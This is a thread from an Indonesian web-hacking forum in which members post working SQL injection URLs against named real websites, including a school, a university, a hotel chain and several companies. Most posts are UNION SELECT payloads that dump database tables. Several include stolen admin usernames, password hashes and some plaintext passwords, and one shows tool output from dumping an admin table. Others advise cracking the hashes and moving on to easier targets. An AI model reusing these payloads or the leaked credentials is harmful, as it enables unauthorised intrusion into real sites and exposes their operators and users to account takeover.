bug site post di sini

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
noval9
Posts: 24
Joined: Sun Jan 17, 2010 6:05 pm

Re: bug site post di sini

Post by noval9 » Sun Jan 17, 2010 8:01 pm

wala
ada SMAN 10 SMG
dket rumah q tuh
-----------------------------------EDIT
btw pass'a di encrypt pke ap tuh????

blackxnovo
Posts: 20
Joined: Fri Jan 15, 2010 2:43 am
Location: anywhere

Re: bug site post di sini

Post by blackxnovo » Mon Jan 18, 2010 7:26 am

noval9 wrote:wala
ada SMAN 10 SMG
dket rumah q tuh
-----------------------------------EDIT
btw pass'a di encrypt pke ap tuh????
Coba kamu decrypt disini:

Code: Select all

http://www.md5decrypter.co.uk/
Jong Ambonese

User avatar
wiLMaR_kiDz
Posts: 964
Joined: Fri Mar 27, 2009 1:03 pm
Location: internet
Contact:

Re: bug site post di sini

Post by wiLMaR_kiDz » Mon Jan 18, 2010 8:00 am

kalo md5 nya udah di tambah salt, alias MD5+salt itu sulit di decrypt...
ane udah mo muntah ngbok2 sna sni utk nyri cra ngdcryptny..
tp hsilnya ttep belum ketemu2 caranya...
jd, kalo ktmu ma trget yg vuln, tapi hashny md5+salt mendingan cri trget lain aj.jgn terpaku dgn trget itu2 aj..
:circle: :circle: :circle:
regards,
ordinary user,-

User avatar
peniru
Posts: 389
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar
Contact:

Re: bug site post di sini

Post by peniru » Mon Jan 18, 2010 3:34 pm

.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]

User avatar
peniru
Posts: 389
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar
Contact:

Re: bug site post di sini

Post by peniru » Mon Jan 18, 2010 3:43 pm

.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]

User avatar
peniru
Posts: 389
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar
Contact:

Re: bug site post di sini

Post by peniru » Mon Jan 18, 2010 4:33 pm

.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]

User avatar
peniru
Posts: 389
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar
Contact:

Re: bug site post di sini

Post by peniru » Wed Jan 20, 2010 9:07 am

Code: Select all

http://www.itmaasia.com/news.php?id=-1%20union%20all%20select%201,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from+information_schema.columns+where+table_name=0x74625f61646d696e--
admin:748d648a0c416374aeda2bfa0291013c,user2:1234,hujian:96E79218965EB72C92A549DD5A330112

Code: Select all

http://www.organicindonesia.org/05infodata-news.php?id=-139%20union%20all%20select%201,2,3,group_concat(column_name),5,6,7,8,9%20from+information_schema.columns+where+table_name=0x74625f75736572--
user_id,username,password,group_id,full_name,date_lastlogin,is_active
miryadi:c28463b3f2fc4b65022609302b258f5a284ac23b,admin:8648d71c7dac323674e7024b31b481ae0a59d2e6,ariyuswanto:1d1fdba8cc76a3facc58226cef01e636139e416b

Code: Select all

http://www.tup.edu.ph/news.php?id=-23%20union%20all%20select%201,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11%20from+users--
access,admin,alumbulletin,alumni,announcements,bids,bulletin,careers,childpage,course,courses,events,faculty,fail,freshmen,image,module,news,option,pages,passers,staff,student_research,subpage,users,welcome
webadmin:*93610C813461FD1597B69AF2EA12E8AE1F4A47B5,eusores:*E3FFD4AF20224F2D11A2D45594FEB3EB088099F9,gracelauzon:*C28876CC6C08587141376E2B4C7F5A085DBADE58,jsareno:*93610C813461FD1597B69AF2EA12E8AE1F4A47B5
admin pagena masi nyari.... :tapa:
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]

Muhammad_ibl
Posts: 12
Joined: Fri Apr 25, 2008 4:54 pm

Re: bug site post di sini

Post by Muhammad_ibl » Sat Jan 30, 2010 6:59 am

Ne ada beberapa bug SQL Injection..Mudah-mudahan dapat menjadi bahan referensi..

Code: Select all

http://www.santika.com/news.php?id=-37%20union%20select%201,2,3,group_concat%28table_name%29

%20from%20information_schema.tables%20where%20table_schema=database%28%29--

Code: Select all

http://www.santika.com/news.php?id=-37%20union%20select%201,2,3,group_concat%28column_name%2

9%20from%20information_schema.columns%20where%20table_name=0x6d656d62657273686970--

Code: Select all

http://www.skw.co.id/news.php?id=-91%20union%20select%201,group_concat%28table_name%29,3,4,5

%20from%20information_schema.tables%20where%20table_schema=database%28%29--

Code: Select all

http://www.milim.com/news.php?id=-100%20union%20select%201,group_concat%28bb_username,0x3a,b

b_password%29,3,4,5,6,7,8%20from%20bb_users--

Code: Select all

http://www.milim.com/news.php?id=-100%20union%20select%201,group_concat%28username,0x3a,pass

word%29,3,4,5,6,7,8%20from%20cms_users--

User avatar
abit doang
Posts: 212
Joined: Wed Mar 19, 2008 3:51 pm
Location: cd ../
Contact:

Re: bug site post di sini

Post by abit doang » Sun Jan 31, 2010 4:06 pm

klow versi 4, d hajar pake schemafuzz lha.. :D
Yaa ALLAH, kayakanlah kami semua, agar kami dapat berbagi lebih banyak lagi :)
dan berilah kepada kami, jodoh yg terbaik dari sisiMU.
aamiin.. :D

http://abid912.wordpress.com/
http://maniak-online.blogspot.com/

adit_coolz
Posts: 13
Joined: Sun Aug 26, 2007 6:59 pm
Location: pAradIse

Re: bug site post di sini

Post by adit_coolz » Wed Feb 10, 2010 1:04 am

Code: Select all

[+] URL:http://www.juventus.co.id/pages.php?id_ref_menu=43+AND+1=2+UNION+SELECT+0,1,darkc0de,3,4,5--
[+] Evasion Used: "+" "--"
[+] 00:41:18
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
	Database: juvewebdb
	User: juveweb@localhost
	Version: 5.0.51b-community-nt
[+] Dumping data from database "juvewebdb" Table "admin"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 3

[0] dana:dana:
[1] Mazh:abcd:
[2] admin:25c2202579eb40e66c5017012db9ee62:25c2202579eb40e66c5017012db9ee62:

[-] [00:41:40]
[-] Total URL Requests 5
[-] Done
lagi belajar,, mohon maap kalo banyak kesalahan :kaca:
Last edited by adit_coolz on Wed Feb 10, 2010 2:19 am, edited 1 time in total.

Post Reply

Return to “Web Hacking”